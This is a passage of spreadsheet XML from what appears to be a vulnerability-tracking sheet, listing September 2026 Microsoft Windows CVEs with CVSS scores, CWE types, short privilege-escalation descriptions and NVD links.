      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69580</t>
        </is>
      </c>
      <c r="D145" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E145" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F145" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I145" s="5" t="inlineStr"/>
      <c r="J145" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K14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5" s="5" t="inlineStr"/>
      <c r="M145" s="5" t="inlineStr"/>
      <c r="N145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O145" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P145" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q145" s="5" t="inlineStr"/>
      <c r="R145" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S145" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69580</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69583</t>
        </is>
      </c>
      <c r="D146" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E146" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F146" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G146" s="5" t="inlineStr"/>
      <c r="H146" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I146" s="5" t="inlineStr"/>
      <c r="J146" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K14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6" s="5" t="inlineStr"/>
      <c r="M146" s="5" t="inlineStr"/>
      <c r="N146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O146" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P146" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q146" s="5" t="inlineStr"/>
      <c r="R146" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S146" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69583</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69584</t>
        </is>
      </c>
      <c r="D147" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E147" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F147" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G147" s="5" t="inlineStr"/>
      <c r="H147" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I147" s="5" t="inlineStr"/>
      <c r="J147" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K14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47" s="5" t="inlineStr"/>
      <c r="M147" s="5" t="inlineStr"/>
      <c r="N147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O147" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P147" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q147" s="5" t="inlineStr"/>
      <c r="R147" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S147" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69584</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69589</t>
        </is>
      </c>
      <c r="D148" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E148" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F148" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G148" s="5" t="inlineStr"/>
      <c r="H148" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I148" s="5" t="inlineStr"/>
      <c r="J148" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K14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8" s="5" t="inlineStr"/>
      <c r="M148" s="5" t="inlineStr"/>
      <c r="N148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O148" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P148" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q148" s="5" t="inlineStr"/>
      <c r="R148" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S148" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69589</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69593</t>
        </is>
      </c>
      <c r="D149" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E149" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F149" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I149" s="5" t="inlineStr"/>
      <c r="J149" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K14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49" s="5" t="inlineStr"/>
      <c r="M149" s="5" t="inlineStr"/>
      <c r="N149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O149" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P149" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q149" s="5" t="inlineStr"/>
      <c r="R149" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S149" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69593</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69687</t>
        </is>
      </c>
      <c r="D150" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E150" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F150" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G150" s="5" t="inlineStr"/>
      <c r="H150" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I150" s="5" t="inlineStr"/>
      <c r="J150" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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0" s="5" t="inlineStr"/>
      <c r="M150" s="5" t="inlineStr"/>
      <c r="N150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O150" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P150" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q150" s="5" t="inlineStr"/>
      <c r="R150" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="S150" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69687</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69707</t>
        </is>
      </c>
      <c r="D151" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E151" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F151" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I151" s="5" t="inlineStr"/>
      <c r="J151" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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1" s="5" t="inlineStr"/>
      <c r="M151" s="5" t="inlineStr"/>
      <c r="N151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O151" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P151" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q151" s="5" t="inlineStr"/>
      <c r="R151" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S151" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69707</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69709</t>
        </is>
      </c>
      <c r="D152" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E152" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F152" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I152" s="5" t="inlineStr"/>
      <c r="J152" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K15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2" s="5" t="inlineStr"/>
      <c r="M152" s="5" t="inlineStr"/>
      <c r="N152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O152" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P152" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q152" s="5" t="inlineStr"/>
      <c r="R152" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S152" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69709</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69738</t>
        </is>
      </c>
      <c r="D153" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E153" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F153" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I153" s="5" t="inlineStr"/>
      <c r="J153" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K15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53" s="5" t="inlineStr"/>
      <c r="M153" s="5" t="inlineStr"/>
      <c r="N153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O153" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P153" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q153" s="5" t="inlineStr"/>
      <c r="R153" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S153" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69738</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69787</t>
        </is>
      </c>
      <c r="D154" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E154" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F154" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G154" s="5" t="inlineStr"/>
      <c r="H154" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I154" s="5" t="inlineStr"/>
      <c r="J154" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K15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54" s="5" t="inlineStr"/>
      <c r="M154" s="5" t="inlineStr"/>
      <c r="N154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O154" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P154" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q154" s="5" t="inlineStr"/>
      <c r="R154" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S154" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69787</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69822</t>
        </is>
      </c>
      <c r="D155" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E155" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F155" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G155" s="5" t="inlineStr"/>
      <c r="H155" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I155" s="5" t="inlineStr"/>
      <c r="J155" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K15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55" s="5" t="inlineStr"/>
      <c r="M155" s="5" t="inlineStr"/>
      <c r="N155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O155" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P155" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q155" s="5" t="inlineStr"/>
      <c r="R155" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="S155" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Windows Kerberos allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69822</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69841</t>
        </is>
      </c>
      <c r="D156" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E156" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F156" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I156" s="5" t="inlineStr"/>
      <c r="J156" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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6" s="5" t="inlineStr"/>
      <c r="M156" s="5" t="inlineStr"/>
      <c r="N156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O156" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P156" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q156" s="5" t="inlineStr"/>
      <c r="R156" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S156" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Encrypting File System (EFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69841</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69844</t>
        </is>
      </c>
      <c r="D157" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E157" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F157" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I157" s="5" t="inlineStr"/>
      <c r="J157" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K15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57" s="5" t="inlineStr"/>
      <c r="M157" s="5" t="inlineStr"/>
      <c r="N157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O157" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P157" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q157" s="5" t="inlineStr"/>
      <c r="R157" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S157" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69844</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69900</t>
        </is>
      </c>
      <c r="D158" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E158" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F158" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I158" s="5" t="inlineStr"/>
      <c r="J158" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K158" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L158" s="5" t="inlineStr"/>
      <c r="M158" s="5" t="inlineStr"/>
      <c r="N158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O158" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P158" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q158" s="5" t="inlineStr"/>
      <c r="R158" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S158" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Kernel Streaming WOW Thunk Service Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69900</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69907</t>
        </is>
      </c>
      <c r="D159" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E159" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F159" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I159" s="5" t="inlineStr"/>
      <c r="J159" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K15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59" s="5" t="inlineStr"/>
      <c r="M159" s="5" t="inlineStr"/>
      <c r="N159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O159" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P159" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q159" s="5" t="inlineStr"/>
      <c r="R159" s="5" t="inlineStr">
        <is>
          <t>CWE-280</t>
        </is>
      </c>
      <c r="S159" s="5" t="inlineStr">
        <is>
          <t>Improper handling of insufficient permissions or privileges in Windows Enterprise App Management allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69907</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69921</t>
        </is>
      </c>
      <c r="D160" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E160" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F160" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I160" s="5" t="inlineStr"/>
      <c r="J160" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K160" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L160" s="5" t="inlineStr"/>
      <c r="M160" s="5" t="inlineStr"/>
      <c r="N160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O160" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P160" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q160" s="5" t="inlineStr"/>
      <c r="R160" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S160" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69921</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70289</t>
        </is>
      </c>
      <c r="D161" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E161" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F161" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I161" s="5" t="inlineStr"/>
      <c r="J161" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K16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1" s="5" t="inlineStr"/>
      <c r="M161" s="5" t="inlineStr"/>
      <c r="N161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O161" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P161" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q161" s="5" t="inlineStr"/>
      <c r="R161" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S161" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Win32 Kernel Subsystem allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70289</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70564</t>
        </is>
      </c>
      <c r="D162" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E162" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
